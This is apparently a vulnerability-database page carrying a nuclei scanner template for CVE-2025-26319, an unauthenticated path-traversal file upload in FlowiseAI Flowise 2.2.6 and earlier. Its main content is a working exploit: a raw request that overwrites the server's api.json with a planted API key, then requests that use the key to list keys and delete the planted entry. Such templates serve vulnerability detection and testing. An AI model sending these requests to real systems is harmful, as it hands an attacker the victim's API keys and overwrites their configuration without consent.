FlowiseAI Flowise <= 2.2.6 - Arbitrary File Upload

Published: 03 Jul 2026 03:01:05. Reported by ProjectDiscovery. Type: nuclei. Source: github.com

FlowiseAI versions 2.2.6 and below suffer from an arbitrary file upload vulnerability.

id: CVE-2025-26319

info:
  name: FlowiseAI Flowise <= 2.2.6 - Arbitrary File Upload
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    FlowiseAI Flowise version 2.2.6 and below contains an arbitrary file upload vulnerability in the /api/v1/attachments endpoint. This vulnerability allows an unauthenticated attacker to upload files outside the intended directory through path traversal, potentially leading to API key exposure and remote code execution. The vulnerability can be exploited by uploading a malicious file to overwrite the .flowise/api.json configuration file.
  impact: |
    Unauthenticated attackers can exploit path traversal in file uploads to overwrite the api.json configuration file, potentially exposing API keys and achieving remote code execution.
  remediation: |
    Upgrade to FlowiseAI Flowise version 2.2.7 or later that properly validates file upload paths.
  reference:
    - https://github.com/advisories/GHSA-69jq-qr7w-j7qh
    - https://github.com/FlowiseAI/Flowise
    - https://nvd.nist.gov/vuln/detail/CVE-2025-26319
  classification:
    epss-score: 0.50789
    epss-percentile: 0.98789
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2025-26319
    cwe-id: CWE-434
  metadata:
    verified: true
    max-request: 3
    vendor: FlowiseAI
    product: Flowise
    shodan-query: title:"Flowise"
    fofa-query: title="Flowise"
  tags: cve,cve2025,flowise,fileupload,intrusive,vkev,vuln,ai

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /api/v1/attachments/..%2f..%2f..%2f..%2f..%2froot%2f/.flowise HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydTh0yj8zypRgPT1w

        ------WebKitFormBoundarydTh0yj8zypRgPT1w
        Content-Disposition: form-data; name="files";filename="api.json"
        Content-type: text/plain

        [{
        "keyName":"=",
        "apiKey":"24NHxsKIZi7Ee34rl7FtW3dtW1IuYjFQDegXP_Bn8yQ",
        "apiSecret":"8648f55db62716a6577b565efb66145b9ad8c50884c57ae8d4f03c4cd8b3ee27b1f77804d320f08bac8aa4b0dbf58a39dacbb767eb05efe1e57d5c66e5d48473.af4b3f229bd11ac5",
        "createdAt":"111",
        "id":"1111"
        }]
        ------WebKitFormBoundarydTh0yj8zypRgPT1w--

    matchers:
      - type: word
        part: body
        words:
          - 'name":'
          - 'mimeType":"text/plain'
        condition: and
        internal: true

  - raw:
      - |
        GET /api/v1/apikey HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer 24NHxsKIZi7Ee34rl7FtW3dtW1IuYjFQDegXP_Bn8yQ

      - |
        DELETE /api/v1/apikey/1111 HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer 24NHxsKIZi7Ee34rl7FtW3dtW1IuYjFQDegXP_Bn8yQ

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'apiKey":"'
          - 'apiSecret":'
          - 'chatFlows'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022044be5a31f9b5273199f2d1e40378da803d05b25ba2a5b89ce9372ff43ee5b9d0022100fae58b1d0074efb996b51c48e5ff456d461a33cb0f80ab501018025be2e28c83:922c64590222798bb761d5b6d8e72950

Scores (as of 04 Feb 2026 07:00):
Vulners AI Score: 7.7 (High risk)
CVSS 3.1: 9.8
EPSS: 0.50789